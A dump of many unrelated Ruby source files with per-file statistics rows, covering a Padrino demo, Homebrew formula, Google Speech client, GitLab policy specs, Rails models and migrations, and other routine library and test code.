module LibDemo
def self.give_me_a_random
@rand ||= rand(100)
end
end
class Complex1Demo < Padrino::Application
set :reload, true
get("/old"){ "Old Sinatra Way" }
end
class Complex2Demo < Padrino::Application
set :reload, true
get("/old"){ "Old Sinatra Way" }
controllers :var do
get(:destroy){ params.inspect }
end
get("/"){ "The magick number is: 12!" } # Change only the number!!!
end
Complex1Demo.controllers do
get("/"){ "Given random #{LibDemo.give_me_a_random}" }
end
Complex2Demo.controllers do
end
Padrino.load!
| 18.878788 | 69 | 0.699839 |
1c69d85b212a03a031026b397d05bbbc968050c9 | 1,637 | require 'locomotive/common'
require_relative '../tools/styled_yaml'
require_relative 'loggers/sync_logger'
require_relative_all 'concerns'
require_relative 'sync_sub_commands/concerns/base_concern'
require_relative 'pull_sub_commands/pull_base_command'
require_relative_all 'pull_sub_commands'
require_relative_all 'sync_sub_commands'
module Locomotive::Wagon
class SyncCommand < Struct.new(:env, :path, :options, :shell)
RESOURCES = %w(site pages content_entries translations).freeze
include ApiConcern
include DeployFileConcern
include InstrumentationConcern
include SpinnerConcern
def self.sync(env, path, options, shell)
self.new(env, path, options, shell).sync
end
def sync
if options[:verbose]
SyncLogger.new
_sync
else
show_wait_spinner('Syncing content...') { _sync }
end
end
private
def _sync
api_client = api_site_client(connection_information)
site = api_client.current_site.get
each_resource do |klass|
klass.sync(api_client, site, path, env)
end
print_result_message
end
def each_resource
RESOURCES.each do |name|
next if !options[:resources].blank? && !options[:resources].include?(name)
klass = "Locomotive::Wagon::Sync#{name.camelcase}Command".constantize
yield klass
end
end
def connection_information
read_deploy_settings(self.env, self.path)
end
def print_result_message
shell.say "\n\nThe content of your local Wagon site has been updated.", :green
true
end
end
end
| 22.121622 | 84 | 0.694563 |
0394ce1d3183d90d96da4ed87f16356ffec449f0 | 1,446 | class Simg2img < Formula
desc "Tool to convert Android sparse images to raw images and back"
homepage "https://github.com/anestisb/android-simg2img"
url "https://github.com/anestisb/android-simg2img/archive/1.1.3.tar.gz"
sha256 "82eb629ac0beb67cc97396e031555f0461dcb66e1b93aad53e2f604a18037c51"
head "https://github.com/anestisb/android-simg2img.git"
bottle do
cellar :any_skip_relocation
sha256 "fdb01a50976fa5baef6f1d2b0fa96718256df5862cdc6e5a2d297f059031ae6f" => :high_sierra
sha256 "782e2bfbd0c4f74573ad00028910c80d0d1ccc3a1d8aa6275a75c16ff62078fc" => :sierra
sha256 "6895f9d52514757e07f47c9e18400330177175a1ef12e96ccf10b91577644557" => :el_capitan
end
def install
system "make", "PREFIX=#{prefix}", "install"
end
test do
system "dd", "if=/dev/zero", "of=512k-zeros.img", "bs=512", "count=1024"
assert_equal 524288, (testpath/"512k-zeros.img").size?,
"Could not create 512k-zeros.img with 512KiB of zeros"
system bin/"img2simg", "512k-zeros.img", "512k-zeros.simg"
assert_equal 44, (testpath/"512k-zeros.simg").size?,
"Converting 512KiB of zeros did not result in a 44 byte simg"
system bin/"simg2img", "512k-zeros.simg", "new-512k-zeros.img"
assert_equal 524288, (testpath/"new-512k-zeros.img").size?,
"Converting a 44 byte simg did not result in 512KiB"
system "diff", "512k-zeros.img", "new-512k-zeros.img"
end
end
| 45.1875 | 93 | 0.720609 |
3812193db510c226702b7a862b0cbbf2266a02c6 | 1,360 | =begin
#Tatum API
## Authentication <!-- ReDoc-Inject: <security-definitions> -->
OpenAPI spec version: 3.9.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.31
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for Tatum::ScryptaTransaction
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'ScryptaTransaction' do
before do
# run before each test
@instance = Tatum::ScryptaTransaction.new
end
after do
# run after each test
end
describe 'test an instance of ScryptaTransaction' do
it 'should create an instance of ScryptaTransaction' do
expect(@instance).to be_instance_of(Tatum::ScryptaTransaction)
end
end
describe 'test attribute "from_address"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "from_utxo"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "to"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 25.660377 | 102 | 0.725 |
ff2e910bffaae1e6d2c2853d52c8f035d5f715c8 | 14,144 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# EDITING INSTRUCTIONS
# This file was generated from the file
# https://github.com/googleapis/googleapis/blob/master/google/cloud/speech/v1p1beta1/cloud_speech.proto,
# and updates to that file get reflected here through a refresh process.
# For the short term, the refresh process will only be runnable by Google
# engineers.
require "json"
require "pathname"
require "google/gax"
require "google/gax/operation"
require "google/longrunning/operations_client"
require "google/cloud/speech/v1p1beta1/cloud_speech_pb"
require "google/cloud/speech/v1p1beta1/credentials"
module Google
module Cloud
module Speech
module V1p1beta1
# Service that implements Google Cloud Speech API.
#
# @!attribute [r] speech_stub
# @return [Google::Cloud::Speech::V1p1beta1::Speech::Stub]
class SpeechClient
attr_reader :speech_stub
# The default address of the service.
SERVICE_ADDRESS = "speech.googleapis.com".freeze
# The default port of the service.
DEFAULT_SERVICE_PORT = 443
# The default set of gRPC interceptors.
GRPC_INTERCEPTORS = []
DEFAULT_TIMEOUT = 30
# The scopes needed to make gRPC calls to all of the methods defined in
# this service.
ALL_SCOPES = [
"https://www.googleapis.com/auth/cloud-platform"
].freeze
class OperationsClient < Google::Longrunning::OperationsClient
self::SERVICE_ADDRESS = SpeechClient::SERVICE_ADDRESS
self::GRPC_INTERCEPTORS = SpeechClient::GRPC_INTERCEPTORS
end
# @param credentials [Google::Auth::Credentials, String, Hash, GRPC::Core::Channel, GRPC::Core::ChannelCredentials, Proc]
# Provides the means for authenticating requests made by the client. This parameter can
# be many types.
# A `Google::Auth::Credentials` uses a the properties of its represented keyfile for
# authenticating requests made by this client.
# A `String` will be treated as the path to the keyfile to be used for the construction of
# credentials for this client.
# A `Hash` will be treated as the contents of a keyfile to be used for the construction of
# credentials for this client.
# A `GRPC::Core::Channel` will be used to make calls through.
# A `GRPC::Core::ChannelCredentials` for the setting up the RPC client. The channel credentials
# should already be composed with a `GRPC::Core::CallCredentials` object.
# A `Proc` will be used as an updater_proc for the Grpc channel. The proc transforms the
# metadata for requests, generally, to give OAuth credentials.
# @param scopes [Array<String>]
# The OAuth scopes for this service. This parameter is ignored if
# an updater_proc is supplied.
# @param client_config [Hash]
# A Hash for call options for each method. See
# Google::Gax#construct_settings for the structure of
# this data. Falls back to the default config if not specified
# or the specified config is missing data points.
# @param timeout [Numeric]
# The default timeout, in seconds, for calls made through this client.
# @param metadata [Hash]
# Default metadata to be sent with each request. This can be overridden on a per call basis.
# @param exception_transformer [Proc]
# An optional proc that intercepts any exceptions raised during an API call to inject
# custom error handling.
def initialize \
credentials: nil,
scopes: ALL_SCOPES,
client_config: {},
timeout: DEFAULT_TIMEOUT,
metadata: nil,
exception_transformer: nil,
lib_name: nil,
lib_version: ""
# These require statements are intentionally placed here to initialize
# the gRPC module only when it's required.
# See https://github.com/googleapis/toolkit/issues/446
require "google/gax/grpc"
require "google/cloud/speech/v1p1beta1/cloud_speech_services_pb"
credentials ||= Google::Cloud::Speech::V1p1beta1::Credentials.default
@operations_client = OperationsClient.new(
credentials: credentials,
scopes: scopes,
client_config: client_config,
timeout: timeout,
lib_name: lib_name,
lib_version: lib_version,
)
if credentials.is_a?(String) || credentials.is_a?(Hash)
updater_proc = Google::Cloud::Speech::V1p1beta1::Credentials.new(credentials).updater_proc
end
if credentials.is_a?(GRPC::Core::Channel)
channel = credentials
end
if credentials.is_a?(GRPC::Core::ChannelCredentials)
chan_creds = credentials
end
if credentials.is_a?(Proc)
updater_proc = credentials
end
if credentials.is_a?(Google::Auth::Credentials)
updater_proc = credentials.updater_proc
end
package_version = Gem.loaded_specs['google-cloud-speech'].version.version
google_api_client = "gl-ruby/#{RUBY_VERSION}"
google_api_client << " #{lib_name}/#{lib_version}" if lib_name
google_api_client << " gapic/#{package_version} gax/#{Google::Gax::VERSION}"
google_api_client << " grpc/#{GRPC::VERSION}"
google_api_client.freeze
headers = { :"x-goog-api-client" => google_api_client }
headers.merge!(metadata) unless metadata.nil?
client_config_file = Pathname.new(__dir__).join(
"speech_client_config.json"
)
defaults = client_config_file.open do |f|
Google::Gax.construct_settings(
"google.cloud.speech.v1p1beta1.Speech",
JSON.parse(f.read),
client_config,
Google::Gax::Grpc::STATUS_CODE_NAMES,
timeout,
errors: Google::Gax::Grpc::API_ERRORS,
metadata: headers
)
end
# Allow overriding the service path/port in subclasses.
service_path = self.class::SERVICE_ADDRESS
port = self.class::DEFAULT_SERVICE_PORT
interceptors = self.class::GRPC_INTERCEPTORS
@speech_stub = Google::Gax::Grpc.create_stub(
service_path,
port,
chan_creds: chan_creds,
channel: channel,
updater_proc: updater_proc,
scopes: scopes,
interceptors: interceptors,
&Google::Cloud::Speech::V1p1beta1::Speech::Stub.method(:new)
)
@recognize = Google::Gax.create_api_call(
@speech_stub.method(:recognize),
defaults["recognize"],
exception_transformer: exception_transformer
)
@long_running_recognize = Google::Gax.create_api_call(
@speech_stub.method(:long_running_recognize),
defaults["long_running_recognize"],
exception_transformer: exception_transformer
)
@streaming_recognize = Google::Gax.create_api_call(
@speech_stub.method(:streaming_recognize),
defaults["streaming_recognize"],
exception_transformer: exception_transformer
)
end
# Service calls
# Performs synchronous speech recognition: receive results after all audio
# has been sent and processed.
#
# @param config [Google::Cloud::Speech::V1p1beta1::RecognitionConfig | Hash]
# *Required* Provides information to the recognizer that specifies how to
# process the request.
# A hash of the same form as `Google::Cloud::Speech::V1p1beta1::RecognitionConfig`
# can also be provided.
# @param audio [Google::Cloud::Speech::V1p1beta1::RecognitionAudio | Hash]
# *Required* The audio data to be recognized.
# A hash of the same form as `Google::Cloud::Speech::V1p1beta1::RecognitionAudio`
# can also be provided.
# @param options [Google::Gax::CallOptions]
# Overrides the default settings for this call, e.g, timeout,
# retries, etc.
# @yield [result, operation] Access the result along with the RPC operation
# @yieldparam result [Google::Cloud::Speech::V1p1beta1::RecognizeResponse]
# @yieldparam operation [GRPC::ActiveCall::Operation]
# @return [Google::Cloud::Speech::V1p1beta1::RecognizeResponse]
# @raise [Google::Gax::GaxError] if the RPC is aborted.
# @example
# require "google/cloud/speech"
#
# speech_client = Google::Cloud::Speech.new(version: :v1p1beta1)
# encoding = :FLAC
# sample_rate_hertz = 44100
# language_code = "en-US"
# config = {
# encoding: encoding,
# sample_rate_hertz: sample_rate_hertz,
# language_code: language_code
# }
# uri = "gs://bucket_name/file_name.flac"
# audio = { uri: uri }
# response = speech_client.recognize(config, audio)
def recognize \
config,
audio,
options: nil,
&block
req = {
config: config,
audio: audio
}.delete_if { |_, v| v.nil? }
req = Google::Gax::to_proto(req, Google::Cloud::Speech::V1p1beta1::RecognizeRequest)
@recognize.call(req, options, &block)
end
# Performs asynchronous speech recognition: receive results via the
# google.longrunning.Operations interface. Returns either an
# +Operation.error+ or an +Operation.response+ which contains
# a +LongRunningRecognizeResponse+ message.
#
# @param config [Google::Cloud::Speech::V1p1beta1::RecognitionConfig | Hash]
# *Required* Provides information to the recognizer that specifies how to
# process the request.
# A hash of the same form as `Google::Cloud::Speech::V1p1beta1::RecognitionConfig`
# can also be provided.
# @param audio [Google::Cloud::Speech::V1p1beta1::RecognitionAudio | Hash]
# *Required* The audio data to be recognized.
# A hash of the same form as `Google::Cloud::Speech::V1p1beta1::RecognitionAudio`
# can also be provided.
# @param options [Google::Gax::CallOptions]
# Overrides the default settings for this call, e.g, timeout,
# retries, etc.
# @return [Google::Gax::Operation]
# @raise [Google::Gax::GaxError] if the RPC is aborted.
# @example
# require "google/cloud/speech"
#
# speech_client = Google::Cloud::Speech.new(version: :v1p1beta1)
# encoding = :FLAC
# sample_rate_hertz = 44100
# language_code = "en-US"
# config = {
# encoding: encoding,
# sample_rate_hertz: sample_rate_hertz,
# language_code: language_code
# }
# uri = "gs://bucket_name/file_name.flac"
# audio = { uri: uri }
#
# # Register a callback during the method call.
# operation = speech_client.long_running_recognize(config, audio) do |op|
# raise op.results.message if op.error?
# op_results = op.results
# # Process the results.
#
# metadata = op.metadata
# # Process the metadata.
# end
#
# # Or use the return value to register a callback.
# operation.on_done do |op|
# raise op.results.message if op.error?
# op_results = op.results
# # Process the results.
#
# metadata = op.metadata
# # Process the metadata.
# end
#
# # Manually reload the operation.
# operation.reload!
#
# # Or block until the operation completes, triggering callbacks on
# # completion.
# operation.wait_until_done!
def long_running_recognize \
config,
audio,
options: nil
req = {
config: config,
audio: audio
}.delete_if { |_, v| v.nil? }
req = Google::Gax::to_proto(req, Google::Cloud::Speech::V1p1beta1::LongRunningRecognizeRequest)
operation = Google::Gax::Operation.new(
@long_running_recognize.call(req, options),
@operations_client,
Google::Cloud::Speech::V1p1beta1::LongRunningRecognizeResponse,
Google::Cloud::Speech::V1p1beta1::LongRunningRecognizeMetadata,
call_options: options
)
operation.on_done { |operation| yield(operation) } if block_given?
operation
end
end
end
end
end
end
| 42.990881 | 131 | 0.591488 |
216aaae70ee261592b08f5165fede4fbab25f03e | 1,016 | require 'spec_helper'
describe NamespacePolicy do
let(:user) { create(:user) }
let(:owner) { create(:user) }
let(:admin) { create(:admin) }
let(:namespace) { create(:namespace, owner: owner) }
let(:owner_permissions) { [:create_projects, :admin_namespace, :read_namespace, :read_statistics] }
subject { described_class.new(current_user, namespace) }
context 'with no user' do
let(:current_user) { nil }
it { is_expected.to be_banned }
end
context 'regular user' do
let(:current_user) { user }
it { is_expected.to be_disallowed(*owner_permissions) }
end
context 'owner' do
let(:current_user) { owner }
it { is_expected.to be_allowed(*owner_permissions) }
context 'user who has exceeded project limit' do
let(:owner) { create(:user, projects_limit: 0) }
it { is_expected.to be_disallowed(:create_projects) }
end
end
context 'admin' do
let(:current_user) { admin }
it { is_expected.to be_allowed(*owner_permissions) }
end
end
| 23.627907 | 101 | 0.67815 |
61fe36b71c7573f92ec7e109e957ee0400ea7d09 | 326 | module TD::Types
# The connection state has changed.
# This update must be used only to show a human-readable description of the connection state.
#
# @attr state [TD::Types::ConnectionState] The new connection state.
class Update::ConnectionState < Update
attribute :state, TD::Types::ConnectionState
end
end
| 32.6 | 95 | 0.742331 |
ff70e40ceb61b08487d3b9bd6e912322dee6e58b | 319 | # frozen_string_literal: true
FactoryBot.define do
factory :registration_number_form, class: WasteCarriersEngine::RegistrationNumberForm do
trait :has_required_data do
initialize_with { new(create(:renewing_registration, :has_required_data, workflow_state: "registration_number_form")) }
end
end
end
| 31.9 | 125 | 0.799373 |
bbf77aed1c2c459cfc9a5c955186209ad2ba1911 | 1,912 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2019_06_01
module Models
#
# Response for CheckIPAddressAvailability API service call.
#
class IPAddressAvailabilityResult
include MsRestAzure
# @return [Boolean] Private IP address availability.
attr_accessor :available
# @return [Array<String>] Contains other available private IP addresses
# if the asked for address is taken.
attr_accessor :available_ipaddresses
#
# Mapper for IPAddressAvailabilityResult class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'IPAddressAvailabilityResult',
type: {
name: 'Composite',
class_name: 'IPAddressAvailabilityResult',
model_properties: {
available: {
client_side_validation: true,
required: false,
serialized_name: 'available',
type: {
name: 'Boolean'
}
},
available_ipaddresses: {
client_side_validation: true,
required: false,
serialized_name: 'availableIPAddresses',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
}
}
}
}
end
end
end
end
| 28.969697 | 77 | 0.524059 |
acf8ab814fd868a726a4ad516f4e0054fbee0cbc | 612 | class Option::ActivationPriceCalc
class << self
def activation_price(user, option)
user.plan.option_price(option.code) * billing_interval_percent_left(user)
end
def billing_interval_percent_left(user)
days_passed = (Time.current.to_date - user.last_withdrawal_date.to_date).to_i
days_left = days_left_to_withdrawal(days_passed)
(days_left.to_f / User::BILLING_INTERVAL.to_f)
end
def days_left_to_withdrawal(days_passed)
if (days_passed != User::BILLING_INTERVAL)
User::BILLING_INTERVAL - days_passed
else
30
end
end
end
end
| 27.818182 | 83 | 0.712418 |
6a77cda2d2122f610261421af21e02f1c88aef12 | 402 | class AddModerationLog < ActiveRecord::Migration[5.2]
def up
add_column "users", "is_moderator", :boolean, :default => false
create_table "moderations" do |t|
t.timestamps :null => false
t.integer "moderator_user_id"
t.integer "story_id"
t.integer "comment_id"
t.integer "user_id"
t.text "action"
t.text "reason"
end
end
def down
end
end
| 21.157895 | 67 | 0.636816 |
e8755cf76918f31ca54645352bd0b4703a70e308 | 4,973 | require 'simplecov'
SimpleCov.start 'rails'
# This file was generated by the `rails generate rspec:install` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# This option will default to `:apply_to_host_groups` in RSpec 4 (and will
# have no way to turn it off -- the option exists only for backwards
# compatibility in RSpec 3). It causes shared context metadata to be
# inherited by the metadata hash of host groups and examples, rather than
# triggering implicit auto-inclusion in groups with matching metadata.
config.shared_context_metadata_behavior = :apply_to_host_groups
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
# # This allows you to limit a spec run to individual examples or groups
# # you care about by tagging them with `:focus` metadata. When nothing
# # is tagged with `:focus`, all examples get run. RSpec also provides
# # aliases for `it`, `describe`, and `context` that include `:focus`
# # metadata: `fit`, `fdescribe` and `fcontext`, respectively.
# config.filter_run_when_matching :focus
#
# # Allows RSpec to persist some state between runs in order to support
# # the `--only-failures` and `--next-failure` CLI options. We recommend
# # you configure your source control system to ignore this file.
# config.example_status_persistence_file_path = "spec/examples.txt"
#
# # Limits the available syntax to the non-monkey patched syntax that is
# # recommended. For more details, see:
# # - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/
# # - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# # - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode
# config.disable_monkey_patching!
#
# # Many RSpec users commonly either run the entire suite or an individual
# # file, and it's useful to allow more verbose output when running an
# # individual spec file.
# if config.files_to_run.one?
# # Use the documentation formatter for detailed output,
# # unless a formatter has already been configured
# # (e.g. via a command-line flag).
# config.default_formatter = "doc"
# end
#
# # Print the 10 slowest examples and example groups at the
# # end of the spec run, to help surface which specs are running
# # particularly slow.
# config.profile_examples = 10
#
# # Run specs in random order to surface order dependencies. If you find an
# # order dependency and want to debug it, you can fix the order by providing
# # the seed, which is printed after each run.
# # --seed 1234
# config.order = :random
#
# # Seed global randomization in this process using the `--seed` CLI option.
# # Setting this allows you to use `--seed` to deterministically reproduce
# # test failures related to randomization by passing the same `--seed` value
# # as the one that triggered the failure.
# Kernel.srand config.seed
end
| 50.232323 | 96 | 0.717474 |
03d1f46b517b58113c57110dee157cc4efd567d5 | 906 | require 'spec_helper'
describe Gitlab::Ci::Status::Build::Common do
let(:user) { create(:user) }
let(:build) { create(:ci_build) }
let(:project) { build.project }
subject do
Gitlab::Ci::Status::Core
.new(build, user)
.extend(described_class)
end
describe '#has_action?' do
it { is_expected.not_to have_action }
end
describe '#has_details?' do
context 'when user has access to read build' do
before do
project.team << [user, :developer]
end
it { is_expected.to have_details }
end
context 'when user does not have access to read build' do
before do
project.update(public_builds: false)
end
it { is_expected.not_to have_details }
end
end
describe '#details_path' do
it 'links to the build details page' do
expect(subject.details_path).to include "jobs/#{build.id}"
end
end
end
| 21.571429 | 64 | 0.643488 |
1db6b3665d8648fb2dcade2ffcb9cd4ff10562f2 | 101 | class GameSessionsPlayer < ApplicationRecord
belongs_to :player
belongs_to :game_session
end
| 20.2 | 44 | 0.80198 |
870d468c1becaaefcc6d439bc3fc7494c5aacca4 | 3,336 | require 'rails_helper'
RSpec.describe Entry, type: :model do
describe '#import_text' do
let(:user) { User.create(name: 'martin') }
let(:entry) {
Entry.create(
user: user,
heslo: Faker::Lorem.word,
rod: Entry.map_rod('m'),
druh: Entry.map_druh('adj')
)
}
let(:meaning) {
Meaning.create(cislo: 1, kvalifikator: Faker::Lorem.word, vyznam: Faker::Lorem.word, entry: entry)
}
it 'parses lokalizace' do
jelen_test_data = <<EOD
(1 sg.) spravne jelen se promΕeΕi f krΓ‘snΓho koΕe; SvΔtlΓ‘ pod JeΕ‘tΔdem LB; ΔJA Dodatky.
(1 sg.) spravne jelen se promΕeΕi f krΓ‘snΓho koΕe; SvΔtlΓ‘ pod JeΕ‘tΔdem LB (HoΕenΓ Paseky); ΔJA Dodatky.
(1 sg.) blbe jelen se promΕeΕi f krΓ‘snΓho koΕe; SvΔtlΓ‘ pod JeΕ‘tΔdem LB (HoΕenΓ Paseky Blbost); ΔJA Dodatky.
(1 sg.) blbe jelen se promΕeΕi f krΓ‘snΓho koΕe; SvΔtlΓ‘ pod JeΕ‘tΔdem LX (HoΕenΓ Paseky); ΔJA Dodatky.
EOD
result = entry.import_text(user, jelen_test_data, meaning.id, true, true)
expect(result.length).to eq(4)
expect(result[0].lokalizace_obec).to eq("564427")
expect(result[0].lokalizace_cast_obce).to be_nil
expect(result[0].lokalizace_text).to eq('')
expect(result[1].lokalizace_obec).to eq("564427")
expect(result[1].lokalizace_cast_obce).to eq("160563")
expect(result[1].lokalizace_text).to eq('')
expect(result[2].lokalizace_obec).to be_nil
expect(result[2].lokalizace_cast_obce).to be_nil
expect(result[2].lokalizace_text).to eq('')
expect(result[3].lokalizace_obec).to be_nil
expect(result[3].lokalizace_cast_obce).to be_nil
expect(result[3].lokalizace_text).to eq('')
end
it 'parses all problematic "zkratka okresu"' do
# PrvnΓ pΕΓklad je PlzeΕ-sever, druhΓ½ PlzeΕ-jih
plzen_test_data = <<EOD
stΓ‘la tam {husa, 1 sg.} a mlΔela; Ε½ilov PM (StΓ½skaly); Ε embera, ZΓ‘kladovΓ©
stΓ‘la tam {husa, 1 sg.} a mlΔela; Ε½inkovy PM; Ε embera, ZΓ‘kladovΓ©
EOD
# NerozpoznΓ‘vΓ‘ nic z okresu Ostrava (OV). NapΕ.:
ostrava_test_data = <<EOD
stΓ‘la tam {husa, 1 sg.} a mlΔela; Ostrava OV; Ε embera, ZΓ‘kladovΓ©
stΓ‘la tam {husa, 1 sg.} a mlΔela; Ostrava OV (AntoΕ‘ovice); Ε embera, ZΓ‘kladovΓ©
stΓ‘la tam {husa, 1 sg.} a mlΔela; Olbramice OV (Janovice); Ε embera, ZΓ‘kladovΓ©
EOD
result = entry.import_text(user, plzen_test_data + ostrava_test_data, meaning.id, true, true)
expect(result.find_all { |r| r.lokalizace_obec.present? }.length).to eq(5)
end
it 'parses lokalizace for "lokalizace_text" case' do
lokalizace_text_test_data = <<EOD
(1 sg.) spravne jelen se promΕeΕi f krΓ‘snΓho koΕe; Blanensko; ΔJA Dodatky.
(1 sg.) spravne jelen se promΕeΕi f krΓ‘snΓho koΕe; Blanensko chyba; ΔJA Dodatky.
EOD
result = entry.import_text(user, lokalizace_text_test_data, meaning.id, true, true)
expect(result.length).to eq(2)
expect(result[0].location_text.identifikator).to eq('Blanensko')
expect(result[1].location_text).to be_nil
end
it 'parses source w/o an autor and the location' do
result = entry.import_text(
user,
"stΓ‘la tam {husa, 1 sg.} a mlΔela; Nymburk NB; ObecnΓ‘ ΕeΔ v Nymburce",
meaning.id, true, true
)[0]
expect(result.lokalizace_obec).to eq("537004")
expect(result.source.name).to eq("ObecnΓ‘ ΕeΔ v Nymburce.")
end
end
end
| 38.344828 | 107 | 0.681954 |
1d104a2a56a290ed5d9a0b5e6c5e81b3160dd19a | 413 | require 'mercadopago.rb'
$mp = MercadoPago.new('ACCESS_TOKEN')
paymentData = Hash[
"transaction_amount" => 100,
"token" => "ff8080814c11e237014c1ff593b57b4d",
"description" => "Title of what you are paying for",
"installments" => 1,
"payment_method_id" => "visa",
"payer" => Hash[
"email" => "[email protected]"
]
]
payment = $mp.post("/v1/payments", paymentData);
puts payment | 22.944444 | 54 | 0.677966 |
6158d79f64c2f70549d6515d4bd6bebf0805913e | 3,069 | # has_many :iterations
# text :name
# text :friendly_id
# text :description
# integer :session_type
# datetime :last_executed_at
class ::CommandProposal::Task < ApplicationRecord
self.table_name = :command_proposal_tasks
attr_accessor :user, :skip_approval
has_many :iterations
has_many :ordered_iterations, -> { order(created_at: :desc) }, class_name: "CommandProposal::Iteration"
scope :search, ->(text) {
where("name ILIKE :q OR description ILIKE :q", q: "%#{text}%")
}
scope :by_session, ->(filter) {
if filter.present?
where(session_type: filter) if filter.to_s.in?(session_types.keys)
else
where(session_type: :function)
end
}
scope :cmd_page, ->(page=nil) {
page = page.presence&.to_i || 1
per = ::CommandProposal::PAGINATION_PER
limit(per).offset(per * (page - 1))
}
enum session_type: {
# Function iterations are much like tasks
function: 1,
# Task will have multiple iterations that are all essentially the same just with code changes
task: 0,
# Console iterations are actually line by line, so order matters
console: 2,
# Modules are included in tasks and not run independently
module: 3,
}
validates :name, presence: true
after_initialize -> { self.session_type ||= :task }
before_save -> { self.friendly_id = to_param }
delegate :line_count, to: :current_iteration, allow_nil: true
delegate :code, to: :current_iteration, allow_nil: true
delegate :result, to: :current_iteration, allow_nil: true
delegate :status, to: :primary_iteration, allow_nil: true
delegate :duration, to: :primary_iteration, allow_nil: true
def lines
iterations.order(created_at: :asc).where.not(id: first_iteration.id)
end
def to_param
friendly_id || generate_friendly_id
end
def approved?
primary_iteration&.approved_at?
end
def first_iteration
ordered_iterations.last
end
def current_iteration
ordered_iterations.first
end
def primary_iteration
console? ? first_iteration : current_iteration
end
def current_iteration_at
current_iteration&.completed_at
end
def current_iteration_by
current_iteration&.requester_name
end
def started_at
iterations.minimum(:started_at)
end
def completed_at
iterations.maximum(:completed_at)
end
def code=(new_code)
if skip_approval
iterations.create(
code: new_code,
requester: user,
status: :approved,
approver: user,
approved_at: Time.current
)
else
iterations.create(code: new_code, requester: user)
end
end
private
def reserved_names
[
"new",
"edit",
]
end
def generate_friendly_id
return if name.blank?
temp_id = name.downcase.gsub(/\s+/, "_").gsub(/[^a-z_]/, "")
loop do
duplicate_names = self.class.where(friendly_id: temp_id).where.not(id: id)
return temp_id if duplicate_names.none? && reserved_names.exclude?(temp_id)
temp_id = "#{temp_id}_#{duplicate_names.count}"
end
end
end
| 23.790698 | 105 | 0.687846 |
26305423c46fe04744ca004fdc21c803ca9682bd | 558 | # frozen_string_literal: true
When(/I navigate to the '(.*)' page/) do |tab|
route = tab.downcase
if route == 'home'
visit('/')
else
visit(route)
end
end
When(/I do (not?) submit username and password/) do |auth|
@user = nil if auth
end
Then(/I should (not?) be logged in/) do |_auth|
expect(@user).to be(nil)
end
Given(/^I am (not?) authenticated$/) do |auth|
if auth
expect(@user).to be(nil)
else
expect(@user).not_to be(nil)
end
end
Then('I should see {string}') do |string|
expect(page.text).to match(string)
end
| 18 | 58 | 0.634409 |
185301615a76cef4744d83889f5a8f08bdf1b0f9 | 554 | When(/^I fill in Associated organisation with "([^"]*)"$/) do |value|
hidden_field = find :xpath, "//input[@id='user_associated_organisation']"
hidden_field.set value
end
When(/^I fill in Associated country with "([^"]*)"$/) do |value|
hidden_field = find :xpath, "//input[@id='user_associated_country']"
user = FactoryGirl.build(:country)
user.save
hidden_field.set value
end
Given(/^a user is associated with an organisation named "(.*?)"$/) do |org|
user = FactoryGirl.build(:user)
user.associated_organisation = org
user.save
end
| 30.777778 | 75 | 0.696751 |
9123858cfa6d4dfcf6cd0aab1d263eb789824569 | 1,703 | # Merb::Router is the request routing mapper for the merb framework.
#
# You can route a specific URL to a controller / action pair:
#
# match("/contact").
# to(:controller => "info", :action => "contact")
#
# You can define placeholder parts of the url with the :symbol notation. These
# placeholders will be available in the params hash of your controllers. For example:
#
# match("/books/:book_id/:action").
# to(:controller => "books")
#
# Or, use placeholders in the "to" results for more complicated routing, e.g.:
#
# match("/admin/:module/:controller/:action/:id").
